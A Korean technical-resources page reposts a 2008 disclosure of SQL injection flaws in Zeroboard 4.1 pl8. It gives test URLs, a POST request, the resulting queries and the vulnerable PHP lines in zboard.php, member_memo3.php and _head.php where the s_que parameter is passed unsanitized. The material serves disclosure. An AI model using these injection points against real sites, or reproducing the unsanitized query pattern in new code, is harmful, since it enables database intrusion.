[4.1 pl8] SQL 인젝션 취약점 발생 > 기술자료 | 해피정닷컴

[4.1 pl8] SQL 인젝션 취약점 발생 > 기술자료

본문 바로가기

사이트 내 전체검색

[4.1 pl8] SQL 인젝션 취약점 발생 > 기술자료

제로보드 [4.1 pl8] SQL 인젝션 취약점 발생

페이지 정보


본문

                                                                                 - 발견자     : XX유치원 선생 황..
                                                                                 도움주신분 : 우리반 7세 친구들 ^^,  회충(Silverbug)

총 3개의 파일 SQL 인젝션 취약한 파일 발견..
그외 관리자 권한이 필요한 소스에서도 다수 발견...(리포팅 안함)

아이들과 해킹 놀이를 하다가 발견!


1. 취약한 파일 :: zboard.php

[TEST Code]
 http://AttackServer/bbs/zboard.php?id=test&s_que=SQL_INJECTION

[Result]
 select * from zetyx_board_test where SQL_INJECTION order by headnum asc limit 0, 20


[File line number]
 17         if($s_que) {
 18                 $_dbTimeStart = getmicrotime();
 19                 $que="select * from $t_board"."_$id $s_que order by $select_arrange $desc limit $start_num, $page_num";
 20                 $result=mysql_query($que,$connect) or Error(mysql_error());
 21             


2. 취약한 파일 ::  member_memo3.php

[TEST Code]
 http://AttackServer/bbs/member_memo3.php?s_que=SQL_INJECTION

[Result]
 select count(*) from zetyx_member_table SQL_INJECTION

[File line number]
 19         if($keyword) {
 20                 if(!$status) $s_que=" where user_id like '%$keyword%' or name like '%$keyword%' ";
 21         }

 23 //전체 회원의 수
 24         $temp2=mysql_fetch_array(mysql_query("select count(*) from $member_table  $s_que"));

 // 오프라인 멤버
 52         if(!$status) {
 53                 $que="select * from $member_table $s_que order by no desc limit $start_num,$page_num";
 54                 $result=mysql_query($que) or Error(mysql_error());




3.  취약한 파일 ::  _head.php

[TEST Code]
 POST /bbs/zboard.php HTTP/1.1
 Host: AttackServer
 Cookie: PHPSESSID=00447af854280a8516774c9ffce366cf
 Content-Length: 128

 page=1&id=test&select_arrange=headnum&desc=asc&page_num=20&selected=&exec=&sn=off&ss=on&sc=on&category=&keyword=Search&x=17&y=11&s_que=SQL INJECTION

[Result]
 select count(*) from zetyx_board_test  where division='1' and  SQL INJECTION and (  subject like '%asdfsadf%'  or memo like '%asdfsadf%'  ) 

[File line number]
 172     $temp=mysql_fetch_array(mysql_query("select count(*) from $t_board"."_$id $s_que ",$connect));


[출처] [4.1 pl8]제로보드 SQL 인젝션 취약점 발견.|작성자 사군
http://blog.naver.com/k9943004?Redirect=Log&logNo=40049967427

 

댓글목록

등록된 댓글이 없습니다.


Total 2,640건 110 페이지
  • RSS
기술자료 목록
460
SQL   12183  2008-04-15 09:55  
열람
제로보드   32713  2008-04-15 09:48  
458
HTML   29591  2008-04-15 08:28  
457
etc보드   12566  2008-04-15 03:47 ~ 2008-04-17 00:00  
456
WindowsServer   16698  2008-04-15 01:23  
455
그누보드   23314  2008-04-14 12:56  
454
WindowsServer   25745  2008-04-14 07:35 ~ 2013-01-28 00:00  
453
HTML   14114  2008-04-10 18:24  
452
SQL   23302  2008-04-10 01:41  
451
일반   18592  2008-04-08 04:02  
450
WindowsServer   12280  2008-04-08 03:53  
449
WindowsServer   11112  2008-04-08 03:43  
448
MSSQL   35395  2008-04-08 03:35  
447
HTML   33099  2008-04-06 22:12  
446
영카트   12370  2008-04-06 08:55  
445
ClassicASP   19141  2008-04-04 04:45  
444
Linux   13260  2008-03-31 09:25 ~ 2017-09-21 00:00  
443
ClassicASP   12788  2008-03-29 16:40  
442
ClassicASP   26093  2008-03-24 17:55 ~ 2012-05-18 00:00  
441
ClassicASP   12823  2008-03-21 08:36  

검색

해피정닷컴 정보

회사소개 회사연혁 협력사 오시는길 서비스 이용약관 개인정보 처리방침

회사명: 해피정닷컴   대표: 정창용   전화: 070-7600-3500   팩스: 042-670-8272
주소: (34368) 대전시 대덕구 대화로 160 대전산업용재유통단지 1동 222호
개인정보보호책임자: 정창용   사업자번호: 119-05-36414
통신판매업신고: 제2024-대전대덕-0405호 [사업자등록확인]  
Copyright 2001~2024 해피정닷컴. All Rights Reserved.